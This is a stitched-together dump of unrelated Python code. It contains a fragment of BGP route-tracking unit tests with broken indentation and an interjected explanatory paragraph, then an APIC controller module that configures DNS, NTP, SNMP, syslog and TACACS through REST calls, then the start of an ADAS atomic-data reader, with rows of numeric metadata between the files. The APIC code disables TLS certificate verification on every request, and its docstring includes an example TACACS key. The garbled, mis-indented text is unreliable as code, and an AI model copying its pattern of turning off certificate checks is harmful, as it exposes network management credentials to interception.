self._append_call("RE2")
        route2_nlri1b = self._new_route_event(
            engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
            worker_b, t.NH1, 200)
        # Source A advertises a route3 for NLRI1. Route3 replaces Route1.
        # Route2 is better than Route3.
        self._append_call("RE3")
        route3_nlri1a = self._new_route_event(
            engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
            worker_a, t.NH1, 100, route1_nlri1a.route_entry)
        # Source B withdraws route2 for NLRI1
        self._append_call("RE4")
        self._new_route_event(
            engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
            worker_b, t.NH1, 200)
        # Check calls and arguments list to _new_best_route and
        # _best_route_removed
        expected_calls = ["RE1", t.NBR, "RE2", "RE3", t.NBR,
                          t.BRR, "RE4", t.NBR, t.BRR]
        self.assertEqual(expected_calls, self._calls, 'Wrong call sequence')
        self.assertEqual(
            3, self.tracker_worker._new_best_route.call_count,
            '3 new_best_route calls for NLRI1')
        self._check_calls(self.tracker_worker._new_best_route.call_args_list,
                          [(t.NLRI1, route1_nlri1a.route_entry),
                           (t.NLRI1, route2_nlri1b.route_entry),
                           (t.NLRI1, route3_nlri1a.route_entry)])
        self.assertEqual(
            2, self.tracker_worker._best_route_removed.call_count,
            '2 best_route_removed calls for NLRI1')
        self._check_calls(
            self.tracker_worker._best_route_removed.call_args_list,
            [(t.NLRI1, route1_nlri1a.route_entry, False),
             (t.NLRI1, route2_nlri1b.route_entry, False)])

    def test_e3_replace_br_is_not_nbr(self):
# Advertise a route that replaces the best route but does not become
# the new best route
self.tracker_worker._new_best_route = mock.Mock(
side_effect=self._call_list(t.NBR))
self.tracker_worker._best_route_removed = mock.Mock(
side_effect=self._call_list(t.BRR))
# 3 sources: A, B and C
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
worker_b = worker.Worker(mock.Mock(), 'worker.Worker-B')
worker_c = worker.Worker(mock.Mock(), 'worker.Worker-C')
# Source A advertises route1 for NLRI1
self._append_call("RE1")
route1_nlri1 = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 300)
        # Source B advertises route2 for NLRI1: route1 is better than route2
self._append_call("RE2")
route2_nlri1 = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 200)
        # Source C also advertises route2
self._append_call("RE3")
self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_c, t.NH1, 200)
# Source A advertises route3 which replaces route1
self._append_call("RE4")
self._new_route_event(engine.RouteEvent.ADVERTISE, t.NLRI1,
[t.RT1, t.RT2], worker_a, t.NH1, 100,
route1_nlri1.route_entry)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
expected_calls = ["RE1", t.NBR, "RE2", "RE3", "RE4", t.NBR, t.BRR]
self.assertEqual(expected_calls, self._calls, 'Wrong call sequence')
self.assertEqual(
2, self.tracker_worker._new_best_route.call_count,
            '2 new_best_route calls for NLRI1')
self._check_calls(self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route1_nlri1.route_entry),
(t.NLRI1, route2_nlri1.route_entry)])
self.assertEqual(
1, self.tracker_worker._best_route_removed.call_count,
'1 best_route_removed call for NLRI1')
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route1_nlri1.route_entry)])

    def test_e4_not_replace_br(self):
        # Advertise a route that does not replace the best route, but becomes
        # the new best route once the best route is withdrawn
self.tracker_worker._new_best_route = mock.Mock(
side_effect=self._call_list(t.NBR))
self.tracker_worker._best_route_removed = mock.Mock(
side_effect=self._call_list(t.BRR))
        # 2 sources: A and B
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
worker_b = worker.Worker(mock.Mock(), 'worker.Worker-B')
# Source A advertises a route1 for NLRI1
self._append_call("RE1")
route1_nlri1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 300)
# Source B advertises a route2. Route1 is better than Route2
self._append_call("RE2")
route2_nlri1b = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 200)
# Source B advertises a route3 for NLRI1. Route3 replaces Route2.
# Route1 is better than Route3
self._append_call("RE3")
route3_nlri1b = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 100, route2_nlri1b.route_entry)
# Source A withdraws route1 for NLRI1
self._append_call("RE4")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 300)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
expected_calls = ["RE1", t.NBR, "RE2", "RE3", "RE4", t.NBR, t.BRR]
self.assertEqual(expected_calls, self._calls, 'Wrong call sequence')
self.assertEqual(
2, self.tracker_worker._new_best_route.call_count,
            '2 new_best_route calls for NLRI1')
self._check_calls(self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry),
(t.NLRI1, route3_nlri1b.route_entry)])
self.assertEqual(
1, self.tracker_worker._best_route_removed.call_count,
'1 best_route_removed call for NLRI1')
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry, False)])

    def test_e5_replace_br_is_nbr_equal(self):
        # Same as E3, but the route that replaces our current best compares
        # equal to the two initially less preferred routes, and becomes a
        # best route alongside them
self.tracker_worker._new_best_route = mock.Mock(
side_effect=self._call_list(t.NBR))
self.tracker_worker._best_route_removed = mock.Mock(
side_effect=self._call_list(t.BRR))
# 3 sources: A, B and C
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
worker_b = worker.Worker(mock.Mock(), 'worker.Worker-B')
worker_c = worker.Worker(mock.Mock(), 'worker.Worker-C')
# Source A advertises route1 for NLRI1
route1 = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 300)
        # We will only check events after this first one
        # to allow for an order-independent test after RE4
del self.tracker_worker._new_best_route.call_args_list[:]
# Source B advertises route2 for NLRI1 : route1 is better than route2
self._append_call("RE2")
route2 = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 200)
        # Source C advertises route3, which compares equal to route2
self._append_call("RE3")
route3 = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_c, t.NH2, 200)
        # Source A advertises route4, which replaces route1
self._append_call("RE4")
route4 = self._new_route_event(engine.RouteEvent.ADVERTISE,
t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH3, 200,
route1.route_entry)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
expected_calls = [t.NBR, "RE2", "RE3", "RE4",
t.NBR, t.NBR, t.NBR, t.BRR]
self.assertEqual(expected_calls, self._calls, 'Wrong call sequence')
self._check_calls(self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route2.route_entry),
(t.NLRI1, route3.route_entry),
(t.NLRI1, route4.route_entry)], False)
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route1.route_entry, False)])
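The tests above all rely on the same tracing pattern: each injected route event appends a marker ("RE1", "RE2", ...) to a shared list, and the mocked callbacks append their own markers (NBR, BRR) through `side_effect`, so the exact ordering of reactions can be asserted. A stripped-down sketch of that mechanism (the names here are illustrative, not the test class's actual helpers):

```python
from unittest import mock

calls = []

def call_list(marker):
    """Return a side effect that records `marker` every time the mock runs."""
    def side_effect(*args, **kwargs):
        calls.append(marker)
    return side_effect

# Hypothetical stand-in for tracker_worker._new_best_route.
new_best_route = mock.Mock(side_effect=call_list("NBR"))

calls.append("RE1")               # the test injects a route event marker...
new_best_route("NLRI1", "entry")  # ...and the tracker's reaction records "NBR"
# calls is now ["RE1", "NBR"], so ordering can be compared to expected_calls
```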
| 44.954809 | 79 | 0.62924 | 5,146 | 38,796 | 4.470463 | 0.064516 | 0.066899 | 0.066507 | 0.039904 | 0.809737 | 0.78935 | 0.771528 | 0.746707 | 0.724103 | 0.716105 | 0 | 0.033332 | 0.277735 | 38,796 | 862 | 80 | 45.006961 | 0.787659 | 0.197881 | 0 | 0.696028 | 0 | 0 | 0.066296 | 0 | 0 | 0 | 0 | 0 | 0.072539 | 1 | 0.044905 | false | 0.003454 | 0.015544 | 0.001727 | 0.072539 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a15cee3e5ac8f54ea19e07ce6e0e45ba938225f6 | 18,818 | py | Python | web_ui/controllers/apic_controller.py | ProgrammabilityandAutomation/ACI-conf-converter | e2be783109c6343539dee626971c215027831d00 | [
"Apache-2.0"
] | null | null | null | web_ui/controllers/apic_controller.py | ProgrammabilityandAutomation/ACI-conf-converter | e2be783109c6343539dee626971c215027831d00 | [
"Apache-2.0"
] | null | null | null | web_ui/controllers/apic_controller.py | ProgrammabilityandAutomation/ACI-conf-converter | e2be783109c6343539dee626971c215027831d00 | [
"Apache-2.0"
] | null | null | null | """
Manages calls to the ACI Controller (APIC)
Examples:
Syslog
method: POST
url: https://apic-lab.dcloud.cisco.com/api/node/mo/uni/fabric/slgroup-groupte-test.json
payload{"syslogGroup":{"attributes":{"dn":"uni/fabric/slgroup-groupte-test","name":"groupte-test","rn":"slgroup-groupte-test","status":"created"},"children":[{"syslogConsole":{"attributes":{"dn":"uni/fabric/slgroup-groupte-test/console","rn":"console","status":"created"},"children":[]}},{"syslogFile":{"attributes":{"dn":"uni/fabric/slgroup-groupte-test/file","rn":"file","status":"created"},"children":[]}},{"syslogProf":{"attributes":{"dn":"uni/fabric/slgroup-groupte-test/prof","rn":"prof","status":"created"},"children":[]}},{"syslogRemoteDest":{"attributes":{"dn":"uni/fabric/slgroup-groupte-test/rdst-1.1.1.1","host":"1.1.1.1","name":"test","rn":"rdst-1.1.1.1","status":"created"},"children":[{"fileRsARemoteHostToEpg":{"attributes":{"tDn":"uni/tn-mgmt/mgmtp-default/oob-default","status":"created"},"children":[]}}]}}]}}
response: {"totalCount":"0","imdata":[]}
SNMP
method: POST
url: https://apic-lab.dcloud.cisco.com/api/node/mo/uni/fabric/snmpgroup-snmp-test.json
payload{"snmpGroup":{"attributes":{"dn":"uni/fabric/snmpgroup-snmp-test","name":"snmp-test","rn":"snmpgroup-snmp-test","status":"created"},"children":[{"snmpTrapDest":{"attributes":{"dn":"uni/fabric/snmpgroup-snmp-test/trapdest-2.2.2.2-port-162","host":"2.2.2.2","secName":"public","rn":"trapdest-2.2.2.2-port-162","status":"created"},"children":[{"fileRsARemoteHostToEpg":{"attributes":{"tDn":"uni/tn-mgmt/mgmtp-default/oob-default","status":"created"},"children":[]}}]}}]}}
response: {"totalCount":"0","imdata":[]}
NTP
method: POST
url: https://apic-lab.dcloud.cisco.com/api/node/mo/uni/fabric/time-default/ntpprov-3.3.3.3.json
payload{"datetimeNtpProv":{"attributes":{"dn":"uni/fabric/time-default/ntpprov-3.3.3.3","name":"3.3.3.3","preferred":"true","rn":"ntpprov-3.3.3.3","status":"created"},"children":[{"datetimeRsNtpProvToEpg":{"attributes":{"tDn":"uni/tn-mgmt/mgmtp-default/oob-default","status":"created"},"children":[]}}]}}
response: {"totalCount":"0","imdata":[]}
DNS
method: POST
url: https://apic-lab.dcloud.cisco.com/api/node/mo/uni/fabric/dnsp-default/prov-[4.4.4.4].json
payload{"dnsProv":{"attributes":{"dn":"uni/fabric/dnsp-default/prov-[4.4.4.4]","addr":"4.4.4.4","status":"created","preferred":"true","rn":"prov-[4.4.4.4]"},"children":[]}}
response: {"totalCount":"0","imdata":[]}
TACACS
method: POST
url: https://apic-lab.dcloud.cisco.com/api/node/mo/uni/userext/tacacsext/tacacsplusprovider-5.5.5.5.json
payload{"aaaTacacsPlusProvider":{"attributes":{"dn":"uni/userext/tacacsext/tacacsplusprovider-5.5.5.5","name":"5.5.5.5","key":"cisco123","rn":"tacacsplusprovider-5.5.5.5","status":"created"},"children":[{"aaaRsSecProvToEpg":{"attributes":{"tDn":"uni/tn-mgmt/mgmtp-default/oob-default","status":"created"},"children":[]}}]}}
response: {"totalCount":"0","imdata":[]}
"""
import json
import os

from jinja2 import Environment
from jinja2 import FileSystemLoader
import requests

DIR_PATH = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
JSON_TEMPLATES = Environment(loader=FileSystemLoader(DIR_PATH + '/json_templates'))
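The Jinja environment above renders JSON payloads from templates in `json_templates/`. Those template files aren't shown here; as an offline stand-in, the substitution step can be sketched with the standard library's `string.Template` (the real code uses Jinja2, and the template body below is a hypothetical shape, not the actual `add_dns.j2.json`):

```python
from string import Template

# Hypothetical stand-in for a payload template such as add_dns.j2.json.
dns_template = Template(
    '{"dnsProv":{"attributes":{"addr":"$dns_ip","status":"created"}}}')

payload = dns_template.substitute(dns_ip="4.4.4.4")
# payload now embeds the provider address, ready to POST to the APIC.
```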


def get_token(url, username, password):
"""
Returns authentication token
:param url:
:param username:
:param password:
:return:
"""
template = JSON_TEMPLATES.get_template('login.j2.json')
payload = template.render(username=username, password=password)
response = requests.post(url + '/api/aaaLogin.json', data=payload, verify=False)
if 199 < response.status_code < 300:
auth = json.loads(response.text)
login_attributes = auth['imdata'][0]['aaaLogin']['attributes']
return login_attributes['token']
else:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
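For reference, the session token lives at `imdata[0].aaaLogin.attributes.token` in the login response. A minimal, offline sketch of that parsing step (the sample body below is hypothetical, shaped like the response `get_token` expects):

```python
import json

# Hypothetical aaaLogin response body, trimmed to the fields get_token reads.
sample = ('{"totalCount":"1","imdata":[{"aaaLogin":'
          '{"attributes":{"token":"abc123"}}}]}')

def extract_token(body):
    """Pull the session token out of an aaaLogin response body."""
    auth = json.loads(body)
    return auth['imdata'][0]['aaaLogin']['attributes']['token']

token = extract_token(sample)  # -> "abc123"
```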


def add_dns(url, auth_token, dns_ip):
"""
Creates a DNS Server in APIC
:param url:
:param auth_token:
:param dns_ip:
:return:
"""
template = JSON_TEMPLATES.get_template('add_dns.j2.json')
payload = template.render(dns_ip=dns_ip)
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/fabric/dnsp-default/prov-[' + dns_ip + '].json',
cookies=cookies, data=payload, verify=False)
    if response.status_code < 200 or response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
template = JSON_TEMPLATES.get_template('add_dns_mgmt_epg.j2.json')
payload = template.render()
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/fabric/dnsp-default/rsProfileToEpg.json',
cookies=cookies, data=payload, verify=False)
    if response.status_code < 200 or response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
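Every function below repeats the same error-handling block: re-raise the APIC error text unless the object already exists. That pattern could be factored into a helper; a sketch under an assumed name (`raise_unless_exists` is not part of this module):

```python
import json

def raise_unless_exists(response_text):
    """Raise the APIC error text unless it is a benign duplicate-object error."""
    text = json.loads(response_text)['imdata'][0]['error']['attributes']['text']
    if " already exists" not in text:
        raise Exception(text)

# A duplicate-object error passes silently; any other error text raises.
raise_unless_exists(
    '{"imdata":[{"error":{"attributes":{"text":"MO already exists"}}}]}')
```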


def add_ntp_pool(url, auth_token, ntp_ip):
"""
Creates a NTP pool in APIC
:param url:
:param auth_token:
:param ntp_ip:
:return:
"""
template = JSON_TEMPLATES.get_template('add_ntp_pool.j2.json')
payload = template.render(ntp_ip=ntp_ip)
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/fabric/time-conf-converter.json',
cookies=cookies, data=payload, verify=False)
    if response.status_code < 200 or response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
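The success criterion throughout this module is any 2xx status (`get_token` checks `199 < status_code < 300`); the inverse, used to decide when to inspect the error text, reads most clearly as a predicate. A small sketch (the helper name is hypothetical):

```python
def is_http_error(status_code):
    """True when the response status falls outside the 2xx success range."""
    return not (200 <= status_code <= 299)

# 2xx statuses are successes; everything else is treated as an error.
checks = [is_http_error(c) for c in (200, 204, 299, 199, 301, 404)]
# -> [False, False, False, True, True, True]
```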


def add_ntp_group_policy(url, auth_token):
"""
Add conf converter NTP pool to default group policy
:param url:
:param auth_token:
:return:
"""
template = JSON_TEMPLATES.get_template('add_ntp_to_group_policy.j2.json')
payload = template.render()
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/fabric/funcprof/podpgrp-default/rsTimePol.json',
cookies=cookies, data=payload, verify=False)
    if response.status_code < 200 or response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])


def add_default_pod_profile(url, auth_token):
"""
Add default policy group to pod profile
:param url:
:param auth_token:
:return:
"""
template = JSON_TEMPLATES.get_template('add_default_pod_profile.j2.json')
payload = template.render()
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/fabric/podprof-default/pods-default-typ-ALL/rspodPGrp.json',
cookies=cookies, data=payload, verify=False)
    if response.status_code < 200 or response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])


def add_snmp_group(url, auth_token, snmp_ip, snmp_port, snmp_community_name,
                   snmp_security_level="", snmp_version='2c'):
    """
    Creates an SNMP destination group in APIC
    :param url:
    :param auth_token:
    :param snmp_ip:
    :param snmp_port:
    :param snmp_community_name:
    :param snmp_security_level:
    :param snmp_version:
    :return:
    """
if snmp_version == '2c':
template = JSON_TEMPLATES.get_template('add_snmp_group.j2.json')
else:
template = JSON_TEMPLATES.get_template('add_snmp_group_v3.j2.json')
payload = template.render(snmp_ip=snmp_ip,
snmp_port=snmp_port,
snmp_community_name=snmp_community_name,
snmp_security_level=snmp_security_level)
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/fabric/snmpgroup-snmp-conf-converter.json',
cookies=cookies, data=payload, verify=False)
    if response.status_code < 200 or response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])


def add_snmp_access_policy(url, auth_token):
    """
    Creates an SNMP access policy in APIC
    :param url:
    :param auth_token:
    :return:
    """
template = JSON_TEMPLATES.get_template('add_snmp_access_policy.j2.json')
payload = template.render()
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/infra/moninfra-default/snmpsrc-conf-converter.json',
cookies=cookies, data=payload, verify=False)
    if response.status_code < 200 or response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])


def add_snmp_fabric_policy(url, auth_token):
    """
    Creates an SNMP fabric policy in APIC
    :param url:
    :param auth_token:
    :return:
    """
template = JSON_TEMPLATES.get_template('add_snmp_fabric_policy.j2.json')
payload = template.render()
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/fabric/monfab-default/snmpsrc-conf-converter.json',
cookies=cookies, data=payload, verify=False)
    if response.status_code < 200 or response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])


def add_snmp_v3_user(url, auth_token, **kwargs):
    """
    Creates an SNMP v3 user in the default SNMP pod policy
    :param url:
    :param auth_token:
    :param kwargs: user attributes (must include 'username')
    :return:
    """
template = JSON_TEMPLATES.get_template('add_snmp_v3_user.j2.json')
payload = template.render(kwargs)
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/fabric/snmppol-default/user-' + kwargs['username'] + '.json',
cookies=cookies, data=payload, verify=False)
    if response.status_code < 200 or response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])


def enable_snmp_default_pod_policy(url, auth_token):
    """
    Enables SNMP in the default SNMP pod policy
    :param url:
    :param auth_token:
    :return:
    """
template = JSON_TEMPLATES.get_template('enable_snmp_default_pod_policy.j2.json')
payload = template.render()
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/fabric/snmppol-default.json',
cookies=cookies, data=payload, verify=False)
    if response.status_code < 200 or response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])


def add_snmp_community_pod_policy(url, auth_token, **kwargs):
    """
    Creates a community in the default SNMP pod policy
    :param url:
    :param auth_token:
    :param kwargs: community attributes (must include 'community_name')
    :return:
    """
template = JSON_TEMPLATES.get_template('add_snmp_community_pod_policy.j2.json')
payload = template.render(kwargs)
cookies = {'APIC-Cookie': auth_token}
response = requests.post(
url + '/api/node/mo/uni/fabric/snmppol-default/community-' + kwargs['community_name'] + '.json',
cookies=cookies, data=payload, verify=False)
    if response.status_code < 200 or response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])


def add_syslog_group(url, auth_token, syslog_ip):
"""
Creates a SysLog Server in APIC
:param url:
:param auth_token:
:param syslog_ip:
:return:
"""
template = JSON_TEMPLATES.get_template('add_syslog_group.j2.json')
payload = template.render(syslog_ip=syslog_ip)
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/fabric/slgroup-conf-converter.json',
cookies=cookies, data=payload, verify=False)
    if response.status_code < 200 or response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])


def add_syslog_access_policy(url, auth_token):
    """
    Creates a SysLog access policy in APIC
    :param url:
    :param auth_token:
    :return:
    """
template = JSON_TEMPLATES.get_template('add_syslog_access_policy.j2.json')
payload = template.render()
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/infra/moninfra-default/slsrc-conf-converter.json',
cookies=cookies, data=payload, verify=False)
    if response.status_code < 200 or response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])


def add_syslog_fabric_policy(url, auth_token):
    """
    Creates a SysLog fabric policy in APIC
    :param url:
    :param auth_token:
    :return:
    """
template = JSON_TEMPLATES.get_template('add_syslog_fabric_policy.j2.json')
payload = template.render()
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/fabric/monfab-default/slsrc-conf-converter.json',
cookies=cookies, data=payload, verify=False)
    if response.status_code < 200 or response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])


def add_tacacs_provider(url, auth_token, tacacs_ip, tacacs_password):
    """
    Creates a Tacacs Server in APIC
    :param url:
    :param auth_token:
    :param tacacs_ip:
    :param tacacs_password:
    :return:
    """
template = JSON_TEMPLATES.get_template('add_tacacs_provider.j2.json')
payload = template.render(tacacs_ip=tacacs_ip,
tacacs_password=tacacs_password)
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/userext/tacacsext/tacacsplusprovider-' + tacacs_ip + '.json',
cookies=cookies, data=payload, verify=False)
    if response.status_code < 200 or response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])


def add_tacacs_group(url, auth_token, tacacs_ip):
"""
Creates a Tacacs group in APIC
:param url:
:param auth_token:
:param tacacs_ip:
:return:
"""
template = JSON_TEMPLATES.get_template('add_tacacs_provider_group.j2.json')
payload = template.render(tacacs_ip=tacacs_ip)
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/userext/tacacsext/tacacsplusprovidergroup-conf-converter.json',
cookies=cookies, data=payload, verify=False)
    if response.status_code < 200 or response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
def add_tacacs_login_domain(url, auth_token):
"""
Creates a Tacacs login domain in APIC
:param url:
:param auth_token:
:return:
"""
template = JSON_TEMPLATES.get_template('add_login_domain_tacacs.j2.json')
payload = template.render()
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/userext/logindomain-conf_converter.json',
cookies=cookies, data=payload, verify=False)
if response.status_code < 200 or response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
def add_default_group_policy(url, auth_token):
"""
Creates a pod group policy called default
:param url:
:param auth_token:
:return:
"""
template = JSON_TEMPLATES.get_template('add_default_group_policy.j2.json')
payload = template.render()
cookies = {'APIC-Cookie': auth_token}
response = requests.post(url + '/api/node/mo/uni/fabric/funcprof/podpgrp-default.json',
cookies=cookies, data=payload, verify=False)
if response.status_code < 200 or response.status_code > 299:
# Do not raise error if object is already there
if " already exists" not in json.loads(response.text)['imdata'][0]['error']['attributes']['text']:
raise Exception(json.loads(response.text)['imdata'][0]['error']['attributes']['text'])
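Each helper above guards on the response status before inspecting the APIC error text. The intended "not a 2xx success" test can be expressed as a standalone predicate; this is a hedged sketch with a hypothetical helper name, not part of the original module:

```python
def is_http_error(status_code):
    """True when the response status is outside the 2xx success range."""
    return status_code < 200 or status_code > 299

# boundary checks: 200 and 299 are successes, 199 and 404 are not
assert not is_http_error(200)
assert not is_http_error(299)
assert is_http_error(199)
assert is_http_error(404)
```

Note that a chained comparison such as `199 < x > 299` would not implement this: it evaluates as `x > 199 and x > 299`, which never catches statuses below 200.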
| 44.173709 | 828 | 0.654427 | 2,429 | 18,818 | 4.956361 | 0.07534 | 0.038874 | 0.053659 | 0.066285 | 0.851317 | 0.814519 | 0.798239 | 0.749398 | 0.724479 | 0.700723 | 0 | 0.01734 | 0.181741 | 18,818 | 425 | 829 | 44.277647 | 0.764515 | 0.286428 | 0 | 0.564516 | 0 | 0.026882 | 0.241008 | 0.120075 | 0 | 0 | 0 | 0 | 0 | 1 | 0.096774 | false | 0.021505 | 0.026882 | 0 | 0.129032 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b810eaf224975e532d563bd0655e6bd8375bdbde | 9,581 | py | Python | src/python2/sdp/model/collision/ADAS_file.py | LeiShi/Synthetic-Diagnostics-Platform | 870120d3fd14b2a3c89c6e6e85625d1e9109a2de | [
"BSD-3-Clause"
] | 5 | 2019-08-16T22:08:19.000Z | 2021-02-24T02:47:05.000Z | src/python2/sdp/model/collision/ADAS_file.py | justthepython/Synthetic-Diagnostics-Platform | 5f1cb5c29d182490acbd4f3c167f0e09ec211236 | [
"BSD-3-Clause"
] | 1 | 2016-05-11T12:58:00.000Z | 2016-05-11T17:18:36.000Z | src/python2/sdp/model/collision/ADAS_file.py | justthepython/Synthetic-Diagnostics-Platform | 5f1cb5c29d182490acbd4f3c167f0e09ec211236 | [
"BSD-3-Clause"
] | 5 | 2018-04-29T12:35:59.000Z | 2020-01-10T03:38:30.000Z | """ Classes for reading different kinds of ADAS files
"""
import numpy as np
import scipy.interpolate as ip
class ADAS_file(object):
""" Parent class for defining the different kind of database readers.
This class is for inheritence purpose only. It will be inherited
by all the ADAS readers.
It defines how to read a block
of data (:func:`read_block <sdp.plasma.collision.ADAS_file.ADAS_file.read_block>`) [often used in 2D data of the ADAS database].
The beam energy is divided by the atomic mass of the beam particles (eV/amu).
:param str name: Name of the ADAS file
:ivar str self.name: Name of the ADAS file
"""
def __init__(self,name):
""" Save the name of the file
:param name: Name of the ADAS file
:type name: str
:ivar str name: Name of the ADAS file
"""
self.name = name
def read_block(self,data,i,array,n):
""" Read one bloc in an ADAS file
The coefficient depending on two coefficients are written in a block form,
thus this function read the block at the line i and return the
number of the final line
:param data: file currently readed (each index is for a line)
